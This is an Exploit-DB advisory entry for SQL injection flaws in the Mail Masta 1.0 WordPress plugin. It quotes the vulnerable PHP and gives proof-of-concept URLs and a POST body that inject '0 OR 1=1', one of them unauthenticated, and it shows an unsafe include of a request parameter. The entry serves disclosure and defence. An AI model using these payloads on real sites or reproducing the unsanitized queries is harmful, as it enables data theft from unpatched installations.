WordPress Plugin Mail Masta 1.0 - SQL Injection

EDB-ID:

41438

CVE:

2017-6098 2017-6097 2017-6096 2017-6095

EDB Verified:

Author:

Hanley Shun

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2017-02-18

Vulnerable App: 
# Exploit Title: Multiple SQL injection vulnerabilities in Mail Masta (aka mail-masta) plugin 1.0 for Wordpress.
# Date: 02/18/2017
# Exploit Author: Hanley Shun
# Vendor Homepage: https://wpcore.com/plugin/mail-masta
# Software Link: https://www.exploit-db.com/apps/78745b48b15bf2b81153556ef1c8ec48-mail-masta.zip
# Version: 1.0
# Tested on: Kali Linux x64, Ubuntu 14.04 x64
# CVE : [CVE-2017-6095, CVE-2017-6096, CVE-2017-6097, CVE-2017-6098]


Mail-Masta SQL Injection

Page: ./wp-content/plugins/mail-masta/inc/lists/csvexport.php (Unauthenticated)

GET Parameter: list_id

http://my_wp_app/wp-content/plugins/mail-masta/inc/lists/csvexport.php?list_id=0+OR+1%3D1&pl=/var/www/html/wordpress/wp-load.php


csvexport.php:

$list_id=$_GET['list_id'];
global $wpdb;
$mail_subscribers = $wpdb->prefix . "masta_subscribers";
$masta_list = $wpdb->prefix . "masta_list";
$check_sql = "SELECT * FROM $mail_subscribers WHERE list_id = $list_id";
$check_list="SELECT * FROM $masta_list WHERE list_id= $list_id";
$wp_list=$wpdb->get_results($check_sql);
$wp_list_s=$wpdb->get_results($check_list);


Page: ./wp-content/plugins/mail-masta/inc/lists/view-list.php (Requires Wordpress admin)

GET Parameter: filter_list

http://my_wp_app/wp-admin/admin.php?page=masta-lists&action=view_list&filter_list=0+OR+1%3D1


view-list.php:

global $wpdb;
$list_id = $_GET['filter_list'];
$masta_list = $wpdb->prefix . "masta_list";
$masta_subscribers = $wpdb->prefix . "masta_subscribers";
$listdata = $wpdb->get_results( $wpdb->prepare("SELECT * FROM $masta_list WHERE list_id= $list_id",$query));
$list_subscribers = $wpdb->get_var( $wpdb->prepare("SELECT COUNT( `list_id` ) FROM $masta_subscribers WHERE list_id= $list_id AND status=1",$query));


Page: ./wp-content/plugins/mail-masta/inc/campaign/count_of_send.php (Requires Wordpress admin)

POST Parameter: camp_id

http://my_wp_app/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php/?pl=/var/www/html/wordpress/wp-load.php


count_of_send.php:

include($_GET['pl']);
global $wpdb;
$camp_id=$_POST['camp_id'];
$masta_reports = $wpdb->prefix . "masta_reports";
$count=$wpdb->get_results("SELECT count(*) co from  $masta_reports where camp_id=$camp_id and status=1");


Page: ./wp-content/plugins/mail-masta/inc/campaign_save.php (Requires Wordpress admin)

POST Parameter: list_id

campaign_save.php:

$list_id=$_POST['list_id'];
$check_list = $wpdb->get_var("SELECT count(id) FROM wp_masta_subscribers where list_id=$list_id");


POST /wp-admin/admin-ajax.php?id= HTTP/1.1

...snip...

action=my_action&url=%2Fvar%2Fwww%2Fhtml%2Fwp-content%2Fplugins%2Fmail-masta%2Finc%2Fcampaign_save.php&sender_selected_list_check=check&list_id=1+OR+1%3D1
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services